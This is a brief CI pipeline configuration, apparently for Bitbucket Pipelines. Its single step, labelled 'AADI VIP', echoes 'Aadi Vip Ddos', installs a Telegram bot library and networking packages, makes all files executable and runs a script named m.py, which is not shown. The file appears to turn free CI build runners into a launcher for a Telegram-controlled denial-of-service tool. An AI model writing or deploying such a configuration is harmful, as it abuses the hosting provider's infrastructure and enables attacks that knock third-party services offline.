pipelines:
  default:
    - step:
        name: AADI VIP
        size: 2x
        image: tensorflow/tensorflow:latest-py3
        script:
          - echo "Aadi Vip Ddos..."
          - conda update conda && conda update --all && conda update numpy && pip install --upgrade pip && pip install --upgrade requests
          - pip install telebot pymongo aiohttp && chmod +x * && python3 m.py
